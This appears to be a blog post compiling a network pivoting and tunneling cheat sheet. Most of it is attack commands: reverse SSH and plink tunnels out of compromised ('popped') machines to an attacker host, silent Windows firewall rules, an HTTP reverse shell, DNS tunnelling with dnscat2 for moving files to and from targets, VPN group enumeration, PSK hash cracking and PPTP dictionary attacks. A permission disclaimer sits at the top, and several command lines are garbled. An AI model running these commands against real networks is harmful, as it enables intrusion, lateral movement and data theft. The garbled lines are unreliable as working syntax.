How to

Network Pivoting and Tunneling Guide

This is for pure educational & informational purpose. Only use these techniques where allowed or you have permission to do so. Power...

Written by Sajal Jain · 2 min read >

This is for pure educational & informational purpose. Only use these techniques where allowed or you have permission to do so. Power comes with great responsibility.

  • Port Forwarding – accept traffic on a given IP address and port and redirect it to a different IP address and port
apt-get install rinetd
cat /etc/rinetd.conf # bindadress bindport connectaddress connectport w.x.y.z 53 a.b.c.d 80
  • SSH Local Port Forwarding: supports bi-directional communication channels
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
  • SSH Remote Port Forwarding: Suitable for popping a remote shell on an internal non routable network
ssh <gateway> -R <remote port to bind>:<local host>:<local port>
  • SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local attacking box to tunnel ALL incoming traffic to ANY host in the DMZ network on ANY PORT
ssh -D <local proxy port> -p <remote port> <target>
  • Proxychains – Perform Nmap scan within a DMZ from an external computer
    • Create a reverse SSH tunnel from the Popped machine on: 2222
ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com ssh -f -N -R 2222:<local host>:22 root@<remote host>
    • Create a Dynamic application-level port forward on 8080 thru 2222
ssh -f -N -D &lt;local host>:8080 -p 2222 hax0r@<remote host>
    • Leverage the SSH SOCKS server to perform Nmap scan on the network using proxy chains
proxychains nmap --top-ports=20 -sT -Pn $ip/24
  • HTTP Tunneling nc -vvn
$ip 8888
  • Traffic Encapsulation – Bypassing deep packet inspection
    • HTTP tunnel
      On the server-side:
sudo hts -F <server ip addr>:<port of your app> 80
    • On the client-side:
sudo htc -P <my proxy.com:proxy port> -F <port of your app> <server ip addr>:80 stunnel

  • Tunnel Remote Desktop (RDP) from a Popped Windows machine to your network
    • Tunnel on port 22
plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>
    • Port 22 blocked? Try port 80? or 443?
plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P80
  • Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel (bypass deep packet inspection)
    • Windows machine add required firewall rules without prompting the user
netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
    • Start the http tunnel client
      • httptunnel_client.exe
    • Create HTTP reverse shell by connecting to localhost port 3000
      • plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P 3000
  • VLAN Hopping
    • git clone https://github.com/nccgroup/vlan-hopping.git chmod 700 frogger.sh ./frogger.sh
  • VPN Overtaking
    • Identify VPN servers:
      ./udp-protocol-scanner.pl -p ike $ip
    • Scan a range for VPN servers:
      ./udp-protocol-scanner.pl -p ike -f ip.txt
    • Use IKEForce to enumerate or dictionary attack VPN servers: pip install pyip git clone https://github.com/SpiderLabs/ikeforce.git
    • Perform IKE VPN enumeration with IKEForce: ./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic
    • Bruteforce IKE VPN using IKEForce: ./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1 
    • Use ike-scan to capture the PSK hash:
ike-scan 
ike-scan TARGET-IP 
ike-scan -A TARGET-IP 
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key 
ike-scan –M –A –n example\_group -P hash-file.txt TARGET-IP 
Use psk-crack to crack the PSK hash:
psk-crack hash-file.txt 
pskcrack psk-crack -b 5 TARGET-IPkey 
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key 
psk-crack -d /path/to/dictionary-file TARGET-IP-key
  • PPTP Overtaking
    • Identifying PPTP, it listens on TCP: 1723
      NMAP PPTP Fingerprint: nmap –Pn -sV -p 1723 TARGET(S) 
    • PPTP Dictionary Attack thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst
  • Port Forwarding/Redirection
  • PuTTY Link tunnel – SSH Tunneling
    • Forward remote port to local address: plink.exe -P 22 -l root -pw "1337" -R 445:<local host>:445 <remote host>
  • SSH Pivoting
    • SSH pivoting from one network to another: ssh -D <local host>:1010 -p 22 user@<remote host>
  • DNS Tunneling
    • dnscat2 supports “download” and “upload” commands for getting iles (data and programs) to and from the target machine.
    • Attacking Machine Installation: apt-get update apt-get -y install ruby-dev git make g++ gem install bundler git clone https://github.com/iagox86/dnscat2.git cd dnscat2/server bundle install
    • Run dnscat2: ruby ./dnscat2.rb dnscat2> New session established: 1422 dnscat2> session -i 1422

DISCLAIMER: Everything is gathered from different web-resources. Parts of the above writeup belong to unknown authors.

Written by Sajal Jain
Cyber Security Enthusiast | OSCP | CEH | CHFI | CNSS | Master of IT Security & Master of IT Management Profile

Leave a Reply

Your email address will not be published. Required fields are marked *